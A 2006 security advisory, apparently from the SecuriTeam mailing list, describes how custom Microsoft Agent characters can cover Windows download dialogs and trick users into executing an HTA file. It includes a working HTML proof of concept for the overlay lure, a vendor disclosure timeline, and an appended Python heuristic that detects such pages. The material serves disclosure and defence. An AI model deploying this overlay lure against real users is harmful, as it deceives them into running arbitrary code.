
| Subject: | [NT] What A Click! (HTA, Microsoft Agent) |
|---|---|
| Date: | 2 Feb 2006 11:07:57 +0200 |
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

What A Click! (HTA, Microsoft Agent)
------------------------------------------------------------------------

SUMMARY

"Microsoft Agent is a technology that provides a foundation for more natural ways for people to communicate with their computers." (<http://www.microsoft.com/msagent/prodinfo/datasheet.asp>)

By using custom Microsoft Agent characters it is possible to cover any kind of window appearing on the user's screen, including security or download dialogs.

DETAILS

Vulnerable Systems:
* Windows 98
* Windows 98 SE
* Windows ME
* Windows 2000
* Windows XP
* Windows 2003 Server

When using custom Microsoft Agent characters it is possible to cover any kind of window, including security or download dialogs. This is an expected feature of the Microsoft Agent control. To quote the product homepage (<http://www.microsoft.com/msagent/prodinfo/datasheet.asp>): "Animations are drawn on top of any underlying application window, characters are not bounded within their own, separate window". Custom characters can be created with tools downloadable from that homepage.

Because custom characters are fully scriptable, can have any kind of shape and are downloaded automatically, this can be used as a flexible tool to cover and/or spoof any kind of window and lure the user into executing arbitrary code by performing one or two clicks (depending on security zone configuration and Windows version).

Proof-of-Concept:

```html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Fireclicking Proof-of-Concept</title>
</head>
<body onLoad="showGenie();">
<div style="font-family:Verdana;font-size:11px;">
<div style="font-family:Verdana;font-size:15px;font-weight:bold;">Fireclicking Proof-of-Concept</div>
Designed for Internet Explorer 6 on Windows XP SP2 with classic theme
<br><br>
<div style="width:600px">
<!-- hidden frame that receives the HTA download; the button triggers it to satisfy drive-by download protection -->
<iframe src="about:blank" style="display:none" name="loadframe" id="loadframe"></iframe>
<input type="button" onclick="loadframe.location='hta.hta'" value="click here first">
<!-- the Microsoft Agent control -->
<OBJECT ID="Agent1" ClassID="clsid:D45FD31B-5C6E-11D1-9EC1-00C04FD7081F" CodeBase="#VERSION=2,0,0,0"></OBJECT>
<script language="JavaScript" type="text/javascript">
function showGenie() {
  // screen position where the download dialog appears, so the character lands on top of it
  var spoofWidth = 500;
  var spoofHeight = 380;
  var spoofScreenX = (screen.width/2)-(spoofWidth/2);
  var spoofScreenY = (screen.height/2)-(spoofHeight/2)+20;
  var path = this.location.href.substr(0,this.location.href.lastIndexOf("/"));
  // load the custom character (a large white image with a button border in the middle)
  Agent1.Characters.Load("Character3", path+"/Character4.acf");
  Genie = Agent1.Characters("Character3");
  Genie.MoveTo(spoofScreenX, spoofScreenY);
  Genie.Show();
  Genie.Get("state", "Showing");
  Genie.Get("animation", "anim1");
  Anim = Genie.Play("anim1");
}
</script>
<br><br>
</div>
</div>
</body>
</html>
```

The PoC is designed for Internet Explorer 6 on Windows XP SP2 in Windows classic theme. By clicking on the button in the upper left corner you start the download of an HTA file. The download dialog gets covered by a Microsoft Agent character which fakes a button (basically a large white image with a button border in the middle). Move the character by dragging to see how it uses a "transparent spot" to make room for clicking on the underlying dialog through the button space. Transparent areas in characters are really "not there", meaning you can click through them.

When you click that button you execute arbitrary code in the HTA file, in this case you create the folder "c:\booom!". The button in the upper left corner is only needed to get around the "drive by download" protection of Windows. When this protection is not in place (e.g. on Windows 2000) this PoC could be reduced to a single click interaction to execute arbitrary code.

Disclosure Timeline:
* 2004-10-04 Vendor informed
* 2004-10-06 Vendor opened case, could not reproduce
* 2004-10-06 Vendor got new testcase
* 2004-10-12 Vendor confirmed bug
* 2005-06-14 Vendor released patch and advisory
* 2006-01-22 Public disclosure

ADDITIONAL INFORMATION

The information has been provided by mikx (<mailto:mikx@mikx.de>).

The vendor advisory can be found at: http://www.securiteam.com/windowsntfocus/5XP0G1FG1A.html

The original proof of concept can be found at: http://www.mikx.de/fireclicking/
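As an added defender-side example (not part of the advisory or of mikx's PoC): a content-inspection heuristic, written here in Python, that flags HTML combining the three ingredients of this lure, the Agent control's CLSID from the PoC, a custom character file loaded from script, and a reference to an HTA file. The sample pages are constructed, and `analyze_page` and `_AgentPageParser` are names chosen for this example.

```python
import re
from html.parser import HTMLParser
# CLSID of the Microsoft Agent ActiveX control, as instantiated in the advisory's PoC.
MSAGENT_CLSID = "d45fd31b-5c6e-11d1-9ec1-00c04fd7081f"

class _AgentPageParser(HTMLParser):
    # Collects <object classid> values and the text of inline <script> blocks.
    def __init__(self):
        super().__init__()
        self.classids, self.scripts, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): (v or "") for k, v in attrs}
        if tag == "object":
            self.classids.append(attrs.get("classid", "").lower())
        elif tag == "script":
            self._in_script = True
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)

def analyze_page(html):
    # Returns which ingredients of the overlay lure the page carries, plus a 0-3 score.
    parser = _AgentPageParser()
    parser.feed(html)
    script = "\n".join(parser.scripts)
    findings = {
        # the Agent control is instantiated on the page
        "agent_control": any(MSAGENT_CLSID in c for c in parser.classids),
        # a custom character file (.acf/.acs) is loaded from script: attacker-drawn shapes
        "custom_character": bool(re.search(r"\.Characters\.Load\s*\([^)]*\.(acf|acs)\b", script, re.I)),
        # something on the page points at an HTA file, the payload used in the PoC
        "hta_reference": bool(re.search(r"\.hta\b", html, re.I)),
    }
    findings["score"] = sum(1 for k in ("agent_control", "custom_character", "hta_reference") if findings[k])
    return findings

# Constructed sample that mirrors the PoC's structure (not the original PoC file).
LURE_PAGE = """<html><body onload="showGenie();">
<input type="button" onclick="loadframe.location='hta.hta'" value="click here first">
<OBJECT ID="Agent1" ClassID="clsid:D45FD31B-5C6E-11D1-9EC1-00C04FD7081F"></OBJECT>
<script>function showGenie(){Agent1.Characters.Load("c", "Character4.acf");}</script>
</body></html>"""
# Constructed benign page: the same control with a stock character and no HTA anywhere.
BENIGN_PAGE = """<html><body>
<OBJECT ID="Agent1" ClassID="clsid:D45FD31B-5C6E-11D1-9EC1-00C04FD7081F"></OBJECT>
<script>Agent1.Characters.Load("Merlin");</script></body></html>"""
```

A score of 3 on a page seen at a proxy or mail gateway is a strong signal for this lure, while a stock character with no HTA (score 1) is ordinary Agent use; the vendor patch from the timeline remains the actual fix.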